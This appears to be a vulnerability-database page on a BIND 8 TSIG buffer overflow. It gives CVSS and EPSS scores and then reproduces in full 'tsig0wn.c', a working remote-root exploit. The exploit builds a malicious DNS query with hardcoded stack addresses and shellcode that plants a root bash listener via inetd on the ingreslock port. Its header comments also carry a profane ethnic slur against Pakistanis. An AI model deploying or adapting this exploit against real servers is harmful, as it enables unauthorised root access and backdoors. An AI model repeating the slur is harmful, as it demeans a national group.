CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
Buffer overflow in transaction signature (TSIG) handling code in BIND 8 allows remote attackers to gain root privileges.
CVE Informations
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
10
AV:N/AC:L/Au:N/C:C/I:C/A:C
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
11%
–
–
2022-04-03
–
–
11%
–
–
2022-05-22
–
–
11%
–
–
2023-03-12
–
–
–
2.83%
–
2023-10-15
–
–
–
2.83%
–
2024-02-11
–
–
–
18.93%
–
2024-06-02
–
–
–
18.93%
–
2024-12-22
–
–
–
7.65%
–
2025-01-19
–
–
–
7.65%
–
2025-03-18
–
–
–
–
54.97%
2025-03-30
–
–
–
–
57.87%
2025-04-22
–
–
–
–
45.43%
2025-04-22
–
–
–
–
45.43,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
/*
* tsig0wn.c
* Copyright Field Marshal August Wilhelm Anton Count Neithardt von Gneisenau
* gneisenau@berlin.com
* The author is not and will not be held responsible for the action of
* other people using this code.
* provided for informational purposes only
* since a greetz section is de rigeur
* greets to my luv scharnie, sheib, darkx, famzah, brainstorm, ghQst, robbot, ......
* a special fuck to all pakis including those idiots from GForce, etc....
* but then pakistan is one big village comprising exclusively of prize idiots
* tabstop set at 3
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/nameser.h>
#include <netdb.h>
#include <errno.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
/*
* This shellcode sux. cant ever get around to coding another one.
*/
char shellcode[] = {
0xeb,0x3b,0x5e,0x31,0xc0,0x31,0xdb,0xb0,0xa0,0x89,
0x34,0x06,0x8d,0x4e,0x07,0x88,0x19,0x41,0xb0,0xa4,
0x89,0x0c,0x06,0x8d,0x4e,0x0a,0x88,0x19,0x41,0xb0,
0xa8,0x89,0x0c,0x06,0x31,0xd2,0xb0,0xac,0x89,0x14,
0x06,0x89,0xf3,0x89,0xf1,0xb0,0xa0,0x01,0xc1,0xb0,
0x0b,0xcd,0x80,0x31,0xc0,0xb0,0x01,0x31,0xdb,0xcd,
0x80,0xe8,0xc0,0xff,0xff,0xff,0x2f,0x62,0x69,0x6e,
0x2f,0x73,0x68,0xff,0x2d,0x63,0xff,
0x2f,0x62,0x69,0x6e,0x2f,0x65,0x63,0x68,0x6f,0x20,0x27,0x69,
0x6e,0x67,0x72,0x65,0x73,0x6c,0x6f,0x63,0x6b,0x20,0x73,0x74,
0x72,0x65,0x61,0x6d,0x20,0x74,0x63,0x70,0x20,0x6e,0x6f,0x77,
0x61,0x69,0x74,0x20,0x72,0x6f,0x6f,0x74,0x20,0x2f,0x62,0x69,
0x6e,0x2f,0x62,0x61,0x73,0x68,0x20,0x62,0x61,0x73,0x68,0x20,
0x20,0x2d,0x69,0x27,0x3e,0x2f,0x74,0x6d,0x70,0x2f,0x2e,0x69,
0x6e,0x65,0x74,0x64,0x2e,0x63,0x6f,0x6e,0x66,0x3b,0x20,0x2f,
0x75,0x73,0x72,0x2f,0x73,0x62,0x69,0x6e,0x2f,0x69,0x6e,0x65,
0x74,0x64,0x20,0x2f,0x74,0x6d,0x70,0x2f,0x2e,0x69,0x6e,0x65,
0x74,0x64,0x2e,0x63,0x6f,0x6e,0x66,0x00,
};
#define NS_T_TSIG 250
#define SHELLCODE_OFFSET 13
#define DUMMY_ARG_OFFSET 176
#define ENUM_FILE 1 //eventlib_p.h line 141
struct {
char *system_name;
unsigned int buffer_start; /* the address where out buffer starts in memory */
unsigned int frame_pointer; /* content of the frame pointer */
int garbage_len; /* length of the garbage in which we will embed ebp|eip */
} system[] = {
{ "Test value 1", 0xbffff640, 0xbffff868, 326, },
{ "Test value 2", 0xbffff5f0, 0xbffff700, 326, },
{ "Slackware 7.0", 0xbffff590, 0xbffff7e8, 326, },
{ NULL, 0x0, 0x0, },
};
void usage (void);
void encode_dns_name (char *, int, int);
int
main (int argc, char *argv[])
{
char query[PACKETSZ]; // construct our query packet here
char *query_ptr; // pointer to walk the query buffer
HEADER *hdr_ptr; // pointer to the header part of the query buffer
int arg;
unsigned int buffer_start,
frame_pointer, // value the frame pointer will have
shellcode_addr; // address our shellcode will have in the named buffer calculated from buffer_start
int index;
char *target_name;
struct hostent *target_host;
struct sockaddr_in target;
int sockfd;
if (argc < 2)
usage ();
while ((arg = getopt (argc, argv, "b:f:s:")) != -1) {
switch (arg){
case 'b': sscanf (optarg, "%x", &buffer_start);
break;
case 'f': sscanf (optarg, "%x", &frame_pointer);
break;
case 's': index = atoi (optarg) - 1;
buffer_start = system[index].buffer_start;
frame_pointer = system[index].frame_pointer;
break;
default : usage ();
}
}
if (!(target_name = argv[optind])){
fprintf (stderr, "tsig0wn: abysmal m0r0n error\n");
exit (1);
}
/*
* Form a header.
*/
memset (query, 0, PACKETSZ);
// cud blow up on other architectures not as liberal as x86. an union like in the bind sources is the correct way to go.
hdr_ptr = (HEADER *)query;
hdr_ptr->id = htons (0x1234);
hdr_ptr->qr = 0;
hdr_ptr->opcode = 0;
hdr_ptr->qdcount = htons (2);
hdr_ptr->arcount = htons (1);
/*
* Form a query after the header where we put in the shellcode
*/
query_ptr = (char *) (hdr_ptr + 1);
memcpy (query_ptr, shellcode, strlen (shellcode)+1);
query_ptr += strlen (shellcode) + 1;
PUTSHORT (T_A, query_ptr);
PUTSHORT (C_IN, query_ptr);
/*
* we form another header here that contains garbage with embedded stuff
* i cud have put this in the same header as the shellcode and have the
* shellcode nullify. (shrug)
*/
{
char *tmp;
unsigned long dummy_argument = buffer_start+DUMMY_ARG_OFFSET;
frame_pointer &= 0xffffff00; // zero out the LSB like the overflow in ns_sign will do
// this will make layout a domain name for the second query, within which
// we will embed our ebp | eip
encode_dns_name (query_ptr, system[index].garbage_len, (frame_pointer - buffer_start) - (query_ptr - query));
query_ptr += system[index].garbage_len;
shellcode_addr = buffer_start + SHELLCODE_OFFSET;
printf ("buffer starts at address = 0x%x\n", buffer_start);
printf ("saved frame pointer after overwrite = 0x%x\n", frame_pointer);
printf ("shellcode will reside at address = 0x%x\n", shellcode_addr);
printf ("dummy argument will reside at address = 0x%x\n", dummy_argument);
// put in the type member of evEvent_p. File is what we need
tmp = query + DUMMY_ARG_OFFSET;
tmp[0] = ENUM_FILE;
tmp[1] = ENUM_FILE >> 8;
tmp[2] = ENUM_FILE >> 16;
tmp[3] = ENUM_FILE >> 24;
// embed the addresses. These will be interpreted as ebp and eip.
// we put the address where our shellcode will be situated twice.
// we overflow the saved frame pointer of datagram_read(). when the
// function returns to __evDispatch() it calls __evDrop().
// because we have shifted the frame pointer and thus __evDispatch()
// notion of the stack we also provide two pointers as arguments to
// __evDispatch. These pointers point to the start of this query header
// name, within which __evDrop will look for evEvent_p->type. we set
// type to be of type 'file' above which causes it to break and execute
// FREE() which in turn calls free().
tmp = query + (frame_pointer - buffer_start); // advance the ptr to the place where we put in our ebp|eip
tmp[0] = shellcode_addr;
tmp[1] = shellcode_addr >> 8;
tmp[2] = shellcode_addr >> 16;
tmp[3] = shellcode_addr >> 24;
tmp[4] = shellcode_addr;
tmp[5] = shellcode_addr >> 8;
tmp[6] = shellcode_addr >> 16;
tmp[7] = shellcode_addr >> 24;
tmp[8] = dummy_argument;
tmp[9] = dummy_argument >> 8;
tmp[10] = dummy_argument >> 16;
tmp[11] = dummy_argument >> 24;
tmp[12] = dummy_argument;
tmp[13] = dummy_argument >> 8;
tmp[14] = dummy_argument >> 16;
tmp[15] = dummy_argument >> 24;
}
PUTSHORT (T_A, query_ptr);
PUTSHORT (C_IN, query_ptr);
/*
* Additional section containing T_SIG stuff
*/
// a name with only one char
memcpy (query_ptr, "\x01m\x00", 3);
query_ptr+=3;
PUTSHORT (NS_T_TSIG, query_ptr);
PUTSHORT (C_IN, query_ptr);
// these members wont be checked at all as find_key returns NULL on testing secretkey_info.
// PUTLONG (0, query_ptr);
// PUTSHORT (0, query_ptr);
/*
* Connect and deliver the payload
*/
if (!(target_host = gethostbyname (target_name))){
fprintf (stderr, "host name resolution error for %s: %s\n", target_name, hstrerror (h_errno));
exit (1);
}
if ((sockfd = socket (PF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0){
perror ("socket");
exit (1);
}
memset (&target, 0, sizeof (target));
target.sin_family = AF_INET;
target.sin_port = htons (53);
target.sin_addr.s_addr = ((struct in_addr *)target_host->h_addr_list[0])->s_addr;
if (connect (sockfd, &target, sizeof (target)) < 0){
perror ("connect");
exit (1);
}
if (send (sockfd, query, query_ptr - query, 0) < 0){
perror ("send");
exit (1);
}
exit (0);
}
void
usage (void)
{
int i;
fprintf (stderr, " tsig0wn\n");
fprintf (stderr, "Copyright Field Marshal August Wilhelm Anton Count Neithardt von Gneisenau\n");
fprintf (stderr, "\nAvailable System Types\n");
for (i = 0; system[i].system_name; i++)
fprintf (stderr, "%d. %s\n", i+1, system[i].system_name);
fprintf (stderr, "\nUsage:\n");
fprintf (stderr, "tsig0wn [ -s system type ] target\nor\n");
fprintf (stderr, "tsig0wn [ -b buffer start address ] [ -f frame pointer content ] target\n");
exit (1);
}
/*
* a pretty convoluted function.
* len is the number of octects to fill in (including the length octect)
* embed_pos is the position where we need to embed this |len|ebp|eip|.
* Hopefully when we overwrite the saved ebp on the stack
* we expect it to point here and take the eip (which in turn points to our
* shellcode) from here. The challenge here is to lay out the octets so
* that it doesnt clash with embed_pos.
*/
void
encode_dns_name (char *buf, int len, int embed_pos)
{
int ctr = 0;
int adjusted = 0;
embed_pos -= 2; // our ebp | eip needs the length octet before it, so adjust for it now + 1
len--; // for the NULL octet at the end.
// sanity check
if (embed_pos >= len){
fprintf (stderr, "encode_dns_name: embed_pos >= len\n");
exit (1);
}
while (ctr < len)
// max 63 octets allowed + preceding 1 octet for length
if (ctr+64 <= len){ // enough space for another 63+1
if (ctr+64 <= embed_pos || adjusted){ // embed_pos not in between
*buf++ = 63;
memset (buf, 'g', 63); buf += 63;
ctr+=64;
}
else { // need to adjust cuz embed_pos in between
*buf++ = embed_pos-ctr-1;
memset (buf, 'o', embed_pos-ctr-1); buf += embed_pos-ctr-1;
ctr+= embed_pos-ctr;
adjusted++;
}
}
else {
if (len - ctr <= embed_pos || adjusted){ // only remaining len - ctr
*buf++ = len-ctr-1;
memset (buf, 'g', len-ctr-1);
ctr += 63; // we are quitting anyway after this. no need to update ctrs
}
else{
*buf++ = embed_pos-len-ctr-1;
memset (buf, 'o', embed_pos-len-ctr-1); buf += embed_pos-len-ctr-1;
ctr += embed_pos-len-ctr;
adjusted++;
}
}
*buf=0x00; // finish with a 0
}
// milw0rm.com [2001-03-01]